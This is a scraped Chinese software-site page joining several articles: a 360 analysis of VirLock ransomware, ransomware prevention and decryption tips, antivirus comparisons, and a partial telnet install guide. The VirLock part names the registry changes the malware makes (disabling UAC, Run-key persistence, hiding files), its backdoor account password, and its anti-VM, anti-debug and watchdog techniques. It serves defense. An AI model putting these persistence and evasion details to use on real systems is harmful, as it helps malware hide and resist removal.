<p>最近有很多電腦用戶反應說今天打開電腦發現所有文件的后綴都變成了“MP3”格式,而且也打不開,即使改了后綴也沒有用,遇到這種情況該怎么辦?所有文件后綴都變成MP3格式是中毒了嗎?下面西西就來為大家科普一下。</p><p><span style="color: rgb(255, 0, 0);"><strong>360安全衛士西西專區:</strong></span><a href="http://m.cr173.com/k/360safe" _src="http://m.cr173.com/k/360safe">http://m.cr173.com/k/360safe</a></p><p><span style="color: rgb(255, 0, 0);"><strong>360安全衛士2016版:</strong></span><a href="http://www.pirinnaturalssoapandspa.com/soft/3188.html" _src="http://www.pirinnaturalssoapandspa.com/soft/3188.html">http://www.pirinnaturalssoapandspa.com/soft/3188.html</a></p><p>如果你也遇到了上述的情況,<span style="color: rgb(255, 0, 0);">比如電腦圖片、office文件、txt、rar等全被篡改后綴名為“MP3”格式,改回來還是打不開的話,那么西西在這里要告訴其實你中了敲詐者病毒啦。</span></p><h3>敲詐者病毒:</h3><p>敲詐者病毒目前主要有VirLock和CTB-Locker兩種,兩種病毒均是敲詐比特幣的。</p><p>VirLock:自定義加密算法,360是目前唯一可以查殺修復感染文件的安全軟件</p><p>CTB-Locker:使用RSA加密算法,敲詐彈窗里有RSA字樣,RSA加密是目前互聯網最主流的加密算法,目前全球所有安全軟件均無法通過查殺進行破解,都是只能在打開病毒文件前進行防御而已,所以已經不幸中毒的只能指望之前的備份,大家對于此病毒主要還是要做好平時的備份。另外國外一個安全網站可以部分提供破解,大家可以嘗試一下,不過不要抱太大希望。</p><p>近期360安全中心檢測到大量文件被一種叫做VirLock的敲詐病毒感染病毒會全盤遍歷硬盤中的可執行文件及文檔、圖片等文件,并將其加密,鎖住用戶的windows帳號,并彈框威脅用戶付費解密文件。</p><p>此為360安全中心首次截獲具有感染能力的敲詐病毒,傳播能力較強,具有多態變形能力,危害極大,請用戶提高警惕。</p><p>目前使用360全線產品可以完美修復系統中被感染的文件。</p><p><span style="color: rgb(255, 0, 0);"><strong>樣本信息:</strong></span></p><p>1.360云安全中心已捕獲Virlock相關樣本近8萬個;</p><p>2.國外最早發現此病毒的為ESET(2014年12月)。目前,360是全球唯一可成功修復Virlock變種感染文件的安全軟件。</p><p><span style="color: rgb(112, 48, 160);"><strong>病毒描述:</strong></span></p><p><strong>攻擊行為一:感染用戶數據文件及可執行文件</strong></p><p>感染文件類型,包括但不限于:</p><p>文檔:DOC、XLS、PDF、PPT</p><p>圖片:PNG、GIF、BMP、JPG</p><p>壓縮文件:RAR、ZIP、7z</p><p>被感染的文件與原文件圖標一致,但是被感染文件是一個可執行病毒文件,結構大致如下:</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573369653507871.png"/></p><p>病毒會遍歷所有的磁盤,網絡共享路徑。加密感染之后,病毒會記錄一個文件列表在%userprofile%\????.txt中(?為隨機字母)如下圖所示。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573369927337019.png"/></p><p><strong>攻擊行為二:加密用戶登陸密碼</strong></p><p>加密當前用戶賬戶,并創建一個新的賬戶:</p><p>賬戶名:Administrator(password:unlockpc)</p><p>密碼:unlockpc</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573370083752454.png"/></p><p>用戶重新登錄時,進入的桌面環境為全新的用戶環境,包括我的文檔,桌面等文件路徑均與之前的環境不同。</p><p>如圖:用戶感染此病毒之后,登錄界面會多出一個用戶(用戶名隨機),且都需要密碼才可以進入。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573370195950269.png"/></p><p><strong>攻擊行為三:關閉系統安全功能</strong></p><p>禁用UAC,使用戶賬戶控制功能失效。</p><p>用戶帳戶控制 (UAC) 可幫助電腦防范黑客或惡意軟件的攻擊。只要程序要對您的電腦執行重要更改,UAC 就會通知您,并詢問您是否許可。</p><p>引用自msdn:http://windows.microsoft.com/zh-cn/windows7/products/features/user-account-control</p><p>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA</p><p>攻擊行為四:實現自啟動</p><p><span style="color: rgb(255, 0, 0);">實現自啟動項:</span></p><p>HKCU\software\microsoft\windows\currentversion\run 名稱隨機</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573370472811475.png"/></p><p>會釋放文件到%userprofile%中,創建隨機文件夾,文件夾設為隱藏屬性,以及隨機文件名。</p><p><span style="color: rgb(255, 0, 0);">釋放文件:</span></p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573370631952070.png"/></p><p>寫入垃圾數據,長度0x200字節(以對抗殺軟檢測):</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573370775515348.png"/></p><p>使用NTFS系統的權限特性,對文件夾進行鎖定,用戶無法打開,刪除文件夾。</p><p>注:XP Professional中,需要在文件夾選項中關閉“簡單文件共享”,才可以看到安全選項卡,XP Home版無此功能。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573371079794523.png"/></p><p><strong>攻擊行為五:隱藏病毒體文件</strong></p><p>病毒會修改注冊表,以隱藏文件擴展名及相關文件:</p><p>HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HideFileExt 1</p><p>HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden 2</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573371361443128.png"/></p><p><strong>攻擊行為六:彈出勒索提示</strong></p><p>病毒全盤感染完畢之后,會彈出勒索提示框進行警告,病毒會勒索0.71 BTC(約合人民幣1000元)。</p><p>如下圖所示:</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573371491713941.png"/></p><p><span style="color: rgb(112, 48, 160);">以上圖片大致中文翻譯:</span></p><p>檢測到系統中存在未經授權的軟件或者盜版軟件,根據USC授權,你的系統已經被禁止使用。如果不支付相關費用,你將會被逮捕,根據相關法律法規,你有可能會被判處5年徒刑。<br/>如果支付相關罰款,你的計算機將會在4-5個工作日進行解鎖,比特幣錢包地址如下:</p><p><span style="color: rgb(227, 108, 9);"><strong>安全建議:</strong></span></p><p>1.不要隨意點擊或運行未經過確認對方身份的郵件附件。特別注意的是.scr .exe 等可執行文件。</p><p>2.更新電腦中的安全軟件,目前360系統急救箱可以檢測并修復被感染文件,隨后360全線安全產品將支持被感染文件修復。</p><p>3.選擇單獨硬盤對電腦中重要的數據資料進行日常備份,防止數據被加密等意外狀況。</p><p>VirLock技術細節:</p><p><span style="color: rgb(255, 0, 0);">1.恢復原始文件:</span></p><p>由于病毒將原始數據包含在自身之中, 所以病毒首先需要將原始數據解密,然后執行之,然后運行,文件恢復的流程如下:</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573371658505140.png"/></p><p>解密方式較為復雜,有三層解密。</p><p><span style="color: rgb(0, 176, 80);">第一層解密:</span></p><p>主要是為了解密第二層,解密算法為循環左移操作:</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573371878661284.png"/></p><p><span style="color: rgb(0, 176, 80);">第二層解密:</span></p><p>其目的是為了解密第三層的解密代碼,解密算法為異或操作。</p><p><span style="color: rgb(0, 176, 80);">第三層解密:</span></p><p>解密原始文件名,原始數據等關鍵數據。解密方式為異或與循環右移相結合。</p><p>如圖:解密出來的原始文件名為2009 &amp;10 015.jpg:</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573372106611784.png"/></p><p>解密出來的原始數據:</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573372227953352.png"/></p><p><span style="color: rgb(255, 0, 0);">2.代碼對抗</span></p><p><span style="color: rgb(0, 112, 192);">1.對抗虛擬機</span></p><p>病毒采用多態變形技術,從入口開始隨機調用API,和虛擬機進行對抗,增加分析難度。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573372346069883.png"/></p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573372802292646.png"/></p><p><span style="color: rgb(0, 112, 192);">2.對抗靜態分析</span></p><p>病毒在解密之后,采用了大量成對的”XCHG EAX,EBX”,使代碼易讀性降低,增加分析難度:</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573372942616193.png"/></p><p><span style="color: rgb(0, 112, 192);">3.對抗動態分析</span></p><p>在運行的過程中,采用了大量的rdtsc進行時間判斷,用于檢測是否處于調試狀態,如果調試則執行不同分支,增加調試復雜度。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573373098140669.png"/></p><p><span style="color: rgb(0, 112, 192);">4.對抗手動清除</span></p><p>病毒會創建多個進程,且互相看護,如果其中任何一個進程結束,則會重新創建一個新的實例,死而復生,永無休止。</p><p>如圖:框中的三個進程互為守護進程。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573373223505674.png"/></p> [網絡安全]怎么查看手機號注冊過哪些網站?手機號注冊查詢軟件使用教程 http://www.pirinnaturalssoapandspa.com//html/80722_1.html 西西 網絡安全 2016/2/26 12:47:33 <p>隨著信息技術的日益成熟,現在我們在各個網站和論壇注冊賬號一般都是用手機號來注冊,這樣做在帶來方便快捷的同時,也有不好的地方。如果我們因為某些原因會更換手機號的話,那么我們之前手機號注冊的一些網站可能會暴露我們的個人信息,因此查詢注銷是十分有必要的。那么問題就在于,如果我們注冊的網站過多,自己記不住的話,怎么辦?小編在這里教大家用一款非常不錯的<strong>手機號注冊查詢軟件</strong>來看看自己的手機號有在哪些網站上注冊過,這樣方便我們進行注銷。</p><p>這款軟件是一款綠色軟件,我們只需要在下載好以后,解壓縮文件,就可以使用了<br/></p><h3>使用方法:</h3><p><strong>1、運行軟件,輸入手機號</strong></p><p><img src="https://pic.cr173.com/up/2016-2/14564631127931654.jpg" title="2016-2-26 13-03-59.jpg"/></p><p><strong>2、點擊“Go Go<span style="line-height: 1em;">”按鈕開始查詢</span></strong></p><p><span style="line-height: 1em;"><img src="https://pic.cr173.com/up/2016-2/14564631502799253.jpg" title="2016-2-26 13-04-13.jpg"/></span></p><p><strong><span style="line-height: 1em;">3、待軟件下方的進度條讀取走完以后,我們就能查看到輸入的手機號在哪些網站上注冊過,這樣我們就可以有目的性的去進行注銷或者更換號碼的操作啦.</span></strong></p><p><span style="line-height: 1em;"><img src="https://pic.cr173.com/up/2016-2/14564632634164991.jpg" title="2016-2-26 13-07-32.jpg"/></span></p><p><span style="line-height: 1em;">看完這篇教程以后,你就不再擔心這樣類似的問題了,對吧。那就趕緊來下載這個非常使用的軟件吧!</span></p> [防護教程]把文件放iPC 2016 保險箱中避免勒索病毒的侵襲吧 http://www.pirinnaturalssoapandspa.com//html/71889_1.html 西西 防護教程 2015/12/29 14:51:28 <p>勒索病毒橫行,除了各大防毒軟體公司無不卯足全力來想辦法破解、阻擋外,各界的網絡高手也絞盡腦汁的想辦法應對?,F在有來自馬來西亞的高手,撰寫了一套電腦用保險箱的程序《iPC 2016》,讓你的重要檔案能夠先被保護。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011209525256507.jpg"/></p><p>《iPC 2016》的概念很簡單,目前已支勒索軟件的加密功能,是無法感染已經加密的檔案,而它的想法就是讓你先把覺得重要的檔案,自己事先加密起來保護著。打開《iPC 2016》之后,它會先要你設定一組密碼,設定完成后,《iPC 2016》它運用C槽的空間,模擬出一個虛擬的磁盤槽,只要把你覺得重要的檔案往這邊放,就可以被《iPC 2016》保護著,以后要取用這些檔案也必須要打開《iPC 2016》程序,登入密碼后才能打開虛擬磁盤槽取用檔案。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011209525330987.jpg"/></p><p>第一次使用iPC 2016時,畢需要先輸入一組密碼。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011209525332192.jpg"/></p><p>設定完成后,就可以進入到程序界面,按下打開的按鈕,就可以看到iPC 2016幫你模擬的虛擬磁盤槽。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011209525487450.jpg"/></p><p>檔案放在這邊就對啰。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011209525483046.jpg"/></p><p>虛擬磁盤槽的位置,目前是存放在C。</p><p>剛剛有提到《iPC 2016》它運用C槽的空間,模擬一個虛擬磁盤槽出來,其實它在C槽底下還是一個文件夾的狀態,只是顯示上是「沒有圖標、沒有名稱」的文件夾,在《iPC 2016》沒有執行的狀態下,甚至無法直接從C槽打開它,可以說是保護的相當嚴謹。而就算《iPC 2016》因為不明原因遭砍除,其實也不用擔心,只要重新下載程序后,</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011209525427901.jpg"/></p><p>加密文件夾是用個非常隱藏的方式存放在C槽,不仔細看根本找不到。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011209525495204.jpg"/></p><p>在iPC2016沒有執行,或是刪除的狀態下,這個文件夾是無法開啟的。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011209525526547.jpg"/></p><p>程序可以隨時關閉或刪除,等到要打開虛擬磁盤槽時,就打開iPC 2016,輸入原本設定的密碼。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011209525522143.jpg"/></p><p>這樣就可以看到你原本存放在里面的擋案啰。</p><p>但目前《iPC 2016》還是有兩個缺點,一個是密碼設定完畢后,《iPC 2016》本身沒有改變密碼的地方,所以使用者設定后,必須要牢記自己的密碼、不要忘記。第二個缺點是,虛擬磁盤槽的設定目前預設是只能在C底下,不能轉移到其他文件夾,但是檔案存放在C槽,其實是有違目前使用者「備份」的概念,再加上現在有不少人C槽其實是SSD,容量空間不足,所以這部分比較可惜。不過真對此兩部分,作者Desmond Lee表示會在近期的版本中作更新修正,請各位耐心等候。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011209525530424.jpg"/></p><p>主界面上的垃圾桶,主要就是一鍵清空虛擬磁盤槽的功能,要是按下去的話,會跳出一個提示視窗,再按下去就是刪除檔案了。</p><p>或許有人提到說,與其浪費時間使用這套軟件,還不如直接使用Dropbox,當然的,在重要檔案不大的狀況下,可以使用Dropbox來處理,但是當檔案超過5G、10G的時候,Dropbox免費空間又有限,這時候可以直接在硬盤上保護的《iPC 2016》,就顯得比較經濟實惠了。</p> [安全產品]金山毒霸和360哪個好 http://www.pirinnaturalssoapandspa.com//html/29989_1.html 西西 安全產品 2015/12/10 19:13:01 <p>自從微軟宣布停止對XP系統的更新支持后,很多xp用戶都十分擔心自己的系統安全。雖然國內的互聯網廠商紛紛表示會繼續支持xp系統的安全問題,可是那么多的產品哪個才是最好的呢,這里西西給大家分析下金山毒霸和360這兩款國內老牌殺軟哪個好。<br/></p><p style="text-align: center;"><img src="https://pic.cr173.com/up/2015-12/14497459712130048.jpg" title="未標é¢?1.jpg"/></p><p><a href="http://www.pirinnaturalssoapandspa.com/soft/30968.html" target="_self">360殺毒最新版</a></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2014-4/201404151614251132901.png"/></p><p>360殺毒軟件創新性地整合了五大領先防殺引擎,包括國際知名的 BitDefender 病毒查殺引擎、小紅傘病毒查殺引擎、 360云查殺引擎、360主動防御引擎、360QVM人工智能引擎;采用Pro3D全面防御體系、刀片式智能五引擎架構、極致輕巧。</p><p><a href="http://www.pirinnaturalssoapandspa.com/soft/29354.html" target="_self">金山毒霸2014</a></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2014-4/13975499838064589.png" title="222038r4v5erehru8rhvef.png"/></p><p><br/></p><p>金山毒霸2014擁有非常小的安裝包(不到10MB)、可以十秒快速完成安裝,對于系統的資源占用也非常的少,獵豹采用30核云端引擎以及藍芯本地引擎,具有非常強悍的病毒偵測能力。</p><p><span style="color: rgb(255, 0, 0);"><strong>無論從體積還是安裝體驗,金山毒霸當屬最佳;</strong></span>360殺毒安裝速度也非???,但需要更新后方便正常使用,耗時依網絡而定;瑞星雖然取消了安裝重啟,安裝速度也得到了大幅提升,但相比毒霸還是稍遜一籌。</p><p>從功能布局上來看,他們都提供了最直接有效的使用路徑給用戶;在界面上,瑞星的UI做的只能說是一般,而360、金山在上面花得功夫要多得多,界面看起來也非常的美觀。</p> [防護教程]歐洲防毒公司推出CryptoLocker勒索病毒疫苗 http://www.pirinnaturalssoapandspa.com//html/68528_1.html 西西 防護教程 2015/12/7 15:19:27 <p>勒索病毒讓人聞之色變,雖然先前我們曾報導過「電腦中了勒索病毒無解嗎?先試試看卡巴斯基的解密工具」,表示卡巴斯基有針對特定種類的勒索軟件來進行解密,但一定要等到出事情才用嗎?其實并不是,現在還有一間歐洲的防毒軟體公司,針對其中兩種勒索病毒「Cryptolocker」和「Cryptowall」,制做了電腦用的「疫苗」,保護你的電腦不被這兩套勒索軟件入侵。</p><p align="center"><img src="https://pic.cr173.com/up/2016-1/2016011210350977529.jpg"/></p><p><br/>↑勒索病毒摧毀許多人電腦內的重要檔案。</p><p>羅馬尼亞的防毒軟體公司Bitdefender,日前針對了「Cryptolocker」和「Cryptowall」兩種勒索病毒推出了電腦疫苗,聲稱這個疫苗可以阻止任何檔案「Cryptolocker」和「Cryptowall」加密,也盡可能有效對抗「Cryptolocker」和「Cryptowall」的變種病毒,他們所推出的疫苗<strong>Bitdefender Anti-CryptoWall</strong>,其實說穿了就是透過即時監控來阻止勒索軟件的啟動。</p><p align="center"><img src="https://pic.cr173.com/up/2016-1/2016011210351189915.png"/></p><p><br/>↑點選網頁右邊紅色的Download就可以下載了。</p><p>當然,勒索軟件百百種,<strong>Bitdefender Anti-CryptoWall</strong>僅能阻擋其中兩種,而且病沒有包含這兩種的變形病毒,使用者除了使用這個疫苗外,最好還是保持著良好的電腦使用習慣,像是「不要亂逛未知網站和開啟檔案」、「軟件(Windows、Adobe、Java)請更新到最新」、「裝可信任的防毒」。</p><p align="center"><img src="https://pic.cr173.com/up/2016-1/2016011210351220418.png"/></p><p><br/>↑程序執行的畫面。</p> [防護教程]ransomware勒索病毒 卡巴斯基的解密工具 http://www.pirinnaturalssoapandspa.com//html/70999_1.html 西西 防護教程 2015/10/16 11:21:05 <p>最近勒索病毒橫行,就連在臺灣也有不少人中獎,這事情大條到就連FBI都說「遭到勒索軟件綁架計算機檔案時,最好的方法就是花錢消災?!谷绱隧憫尣簧倬W友心灰意冷,不過現在知名防毒軟體卡巴斯基釋出了一個解密軟件,大家在交付贖款(或是咬牙重灌)前,可以先試試看這套軟件。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011210381315267.png"/></p><p><br/>↑其實真的沒想過會聽到FBI這樣子響應。來源:http://technews.tw/2015/10/31/fbi-advises-to-pay-up-for-ransomware/</p><p>勒索程序(ransomware)又名流氓軟件,他會將你電腦上的照片、文件等檔案加密,并且在電腦中留下聯系方式,要求受害者交付贖金,才能取得將檔案解密的解密密鑰。由于實在太過猖獗,荷蘭警方的國家高科技犯罪部門在今年4月開始與卡巴斯基攜手合作,研究如何對抗其中兩種勒索軟件「CoinVault」、「Bitcryptor」。甚至也因為荷蘭警方在9月逮捕了相關勒索程序的作者,接管病毒的伺服器后,卡巴斯基也因此取得了解密密鑰。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011210381529121.jpg"/></p><p><br/>↑現在CoinVault與Bitcryptor的勒索軟件有解了。</p><p>卡巴斯基日前將取得的CoinVault與Bitcryptor所有的解密密鑰總計超過1.4萬個,加入解密程序的數據庫中,使用者只要一執行解密程序,它就會自動將所有加密的檔案解密,其實卡巴斯基與CoinVault的對抗,是從2014年就開始的,只是當時因為數據庫不齊全,現在宣稱已搜集CoinVault與Bitcryptor的所有解密密鑰,讓受害者免費使用。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011210381582270.png"/></p><p><br/>↑卡巴斯基這五年來,一直努力對抗勒索軟件。</p><p>此外,卡巴斯基還霸氣的批評FBI,認為附錢給勒索軟件作者并不是好做法,因為沒人能保證付錢后檔案就會回來,而且付錢是一種助長罪犯的行為。</p> [防護教程]簡單預防檔案加密病毒《TorrentLocker》及《Crypt0L0cker》 http://www.pirinnaturalssoapandspa.com//html/69284_1.html 西西 防護教程 2015/9/16 16:10:15 <p>大家應該多少有耳聞「我的計算機檔案被加密了,黑客要求我付XX元比特幣,否則我整臺電腦的檔案都無法使用」這類的案例。原以為這種事情只發生在遙遠的國外,但是最近竟然在臺灣地區聽到類似的事情。于是就著手整理了這篇,希望能在事情發生之前,盡可能地降低大家的中獎的可能性。(這并不是樂透還是發票,就真的別中了)</p><p align="center"><img src="https://pic.cr173.com/up/2016-1/2016011210455171226.jpg"/></p><p>↑日本方面也有傳出勒索病毒的消息。</p><p>根據《ithome》報導指出,《Crypt0L0cker》是在2013年時引發恐慌的勒索軟件,原本在2014年6月被各國警方破獲,但是在2014年年底,有資安公司發現《TorrentLocker》的存在,比起《Crypt0L0cker》是單一的英文版本,《TorrentLocker》講究的是「在地化服務」,有著各國語言版本?!禩orrentLocker》是透過電子郵件散布的,標題則會視當地國家在意的話題,比如沒繳的電話費、候選人的支持等等,資安公司ESET就說「這是一個相當本土化的攻擊手法?!共《局饕i定攻擊歐洲國家,包括:英國,澳大利亞,加拿大,捷克共和國,意大利,愛爾蘭,法國,德國,荷蘭,新西蘭,西班牙和土耳其等,但在日本也曾發現蹤跡。</p><p>而臺灣在怎么撐,也在今年4月時傳出案例,網友ray1988man在巴哈姆特發布了一系列的畫面,表示他被《Crypt0L0cker》纏上,「電腦幾乎所有的圖片檔、視頻檔、壓縮檔、office文件檔、pdf檔全都加密」。ray1988man并表示「加密過程,防毒軟體根本辨識不出來,而且只有放毒的人才有加密的key,然后跟你勒索費用。病毒很好刪,主要是后續問題,被加密的文件不會被解密,想救回來就是付錢,不過也別傻去付錢?!?lt;/p><p>受害者特征</p><p>在巴哈姆特與Mobile01的網友通力合作、收集各方信息下,終于有比較明確的應對方式:</p><p>1.該病毒為多語系–至少有英文、西班牙文、德文、日文、中文、韓文、泰文。<br/>2.感染途徑確認為Drive-by download attack,會在瀏覽被改竄的惡意網站、或開啟郵件、甚至點選彈跳視窗時強制安裝病毒。<br/>3.會被感染電腦的特征都有下列四者其中之一–<br/> a.舊版Java。<br/> b.舊版Adobe Reader。<br/> c.舊版Adobe Flash Player。<br/> d.沒有將Windows Update更新到最新。<br/>換言之、如果上述四者都有更新到最新版,那么感染的機會微乎其微。</p><p>因XP已經不再更新/修補系統,所以XP無法從系統這部分抵御病毒入侵。<br/>4.2015/05/01現在目前除了鏡像檔還原外沒有任何有效的解法。</p><p>(來源:Mobile01)</p><p align="center"><img src="https://pic.cr173.com/up/2016-1/2016011210455254878.jpg"/></p><p align="center"><img src="https://pic.cr173.com/up/2016-1/2016011210455370877.jpg"/></p><p>↑這不是國外的事情,近幾個月臺灣也開始傳出災情了。</p><p>病毒潛伏特徵</p><p>不確定自己是否中毒者,可以檢查一下電腦中有沒有含有「encrypted」的檔案。若有,請盡速備份重要檔案。並進入安全模式下想辦法找出有問題的執行檔刪除。另,有不少案例中傳出,中毒者的電腦中會多出以下的檔案,使用者可以參考一下。</p><p>可能跑出現的檔案</p><p>HELP_TO_SAVE_FILES.txt</p><p>HELP_RESTORE_FILES.txt</p><p>DECRYPT_INSTRUCTIONS</p><p>RECOVERY_FILE.txt</p><p>.encrypted</p><p>*.ezz</p><p>*.ecc</p><p>(來源:巴哈姆特)</p><p align="center"><img src="https://pic.cr173.com/up/2016-1/2016011210455322546.png"/></p><p>↑許多中毒者的電腦中,許多資料夾內都跑出這些檔案。來源:巴哈姆特</p><p>對應方式</p><p>1.Windows系統更新:更新名稱有「安全性更新」的項目全裝。</p><p align="center"><img src="https://pic.cr173.com/up/2016-1/2016011210455427064.jpg"/></p><p>↑有標記「安全性更新」的更新檔,全部都要安裝。</p><p><strong>2.以下五個軟體更新到最新</strong></p><p>Jave:驗證JAVE版本</p><p>Adobe Reader:Adobe Reader最新版下載處</p><p>Adobe Flash Player:Flash Player更新網址</p><p>Silverlight:Silverlight下載處</p><p>Chrome:最新版下載處</p><p>3.Win XP使用者,因為系統已經停止支援更新。請盡速更換成Win7或是更高版本作業系統。</p><p>基本上,「電腦裝上有效的防毒軟體」與「正確的上網習慣」是避免中毒的不二法門,如果你真的不小心電腦被加密檔案了,請認知一個觀念「不要付錢!」一方面是你付錢,等於你贊同這樣的行為,讓駭客繼續躺著賺。二方面是,目前有許多案例傳出,駭客所使用的演算法有問題,你付錢拿到的檔案不見得能夠解除加密,但是到這時候也是沒有用的了。</p><p>↑這不是國外的事情,近幾個月臺灣也開始傳出災情了。</p><p><strong>病毒潛伏特征</strong></p><p>不確定自己是否中毒者,可以檢查一下電腦中有沒有含有「encrypted」的檔案。若有,請盡速備份重要檔案。并進入安全模式下想辦法找出有問題的執行檔刪除。另,有不少案例中傳出,中毒者的電腦中會多出以下的檔案,使用者可以參考一下。</p><p>可能跑出現的檔案</p><p>HELP_TO_SAVE_FILES.txt</p><p>HELP_RESTORE_FILES.txt</p><p>DECRYPT_INSTRUCTIONS</p><p>RECOVERY_FILE.txt</p><p>.encrypted</p><p>*.ezz</p><p>*.ecc</p><p>(來源:巴哈姆特)</p><p align="center"><img src="https://pic.cr173.com/up/2016-1/2016011210455322546.png"/></p><p>↑許多中毒者的電腦中,許多文件夾內都跑出這些檔案。來源:巴哈姆特</p><p>對應方式</p><p>1.Windows系統更新:更新名稱有「安全性更新」的項目全裝。</p><p align="center"><img src="https://pic.cr173.com/up/2016-1/2016011210455427064.jpg"/></p><p>↑有標記「安全性更新」的更新檔,全部都要安裝。</p><p>2.以下五個軟件更新到最新</p><p>Jave:驗證JAVE版本</p><p>Adobe Reader:Adobe Reader最新版下載處</p><p>Adobe Flash Player:Flash Player更新網址</p><p>Silverlight:Silverlight下載處</p><p>Chrome:最新版下載處</p><p>3.Win XP使用者,因為系統已經停止支持更新。請盡速更換成Win7或是更高版本操作系統。</p><p>基本上,「電腦裝上有效的防毒軟體」與「正確的上網習慣」是避免中毒的不二法門,如果你真的不小心電腦被加密檔案了,請認知一個觀念「不要付錢!」一方面是你付錢,等于你贊同這樣的行為,讓黑客繼續躺著賺。二方面是,目前有許多案例傳出,黑客所使用的算法有問題,你付錢拿到的檔案不見得能夠解除加密,但是到這時候也是沒有用的了。</p> [網絡安全]windows2008安裝telnet程序 http://www.pirinnaturalssoapandspa.com//html/58770_1.html 西西小熊 網絡安全 2015/5/17 22:45:13 <p>Telnet協議是TCP/IP協議族中的一員,是Internet遠程登陸服務的標準協議和主要方式。它為用戶提供了在本地計算機上完成遠程主機工作的能力。在終端使用者的電腦上使用telnet程序,用它連接到服務器。終端使用者可以在telnet程序中輸入命令,這些命令會在服務器上運行,就像直接在服務器的控制臺上輸入一樣??梢栽诒镜鼐湍芸刂品⻊掌?。要開始一個telnet會話,必須輸入用戶名和密碼來登錄服務器。Telnet是常用的遠程控制Web服務器的方法。</p><p><br/></p><p>默認在 XP下面telnet組件是自動安裝的,但在 win7 以后的版本都需要自動手動安裝才可以用。西西這個文章就教大家如何在 2008下面安裝 telnet</p><p><br/></p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微軟雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);"><strong style="line-height: 22.75px;">“telnet”不是內部或外部命令,也不是可運行的程序或批處理文件。</strong></p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微軟雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);">這是因為telnet在sever2008下默認是沒有安裝的,需要安裝后使用。</p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微軟雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);">在“服務器管理器”管理界面中左側打開“功能”一項:</p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微軟雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);"><a class="cboxElement" rel="nofollow" href="http://pic.cr173.com/up/2015-5/2015051722474228709.png" style="color: rgb(1, 150, 227); line-height: 22.75px;"><img alt="" width="701" height="458" original="http://pic.cr173.com/up/2015-5/2015051722474228709.png" src="https://pic.cr173.com/up/2015-5/2015051722474228709.png" style="border: 0px; max-width: 100%; height: auto; margin: 0px 0px 10px; padding: 0px; display: inline; background-color: transparent;"/></a></p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微軟雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);">點擊右側的“添加功能”</p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微軟雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);"><a class="cboxElement" rel="nofollow" href="http://pic.cr173.com/up/2015-5/2015051722474275045.png" style="color: rgb(1, 150, 227); line-height: 22.75px;"><img alt="" width="696" height="513" original="http://pic.cr173.com/up/2015-5/2015051722474275045.png" src="https://pic.cr173.com/up/2015-5/2015051722474275045.png" style="border: 0px; max-width: 100%; height: auto; margin: 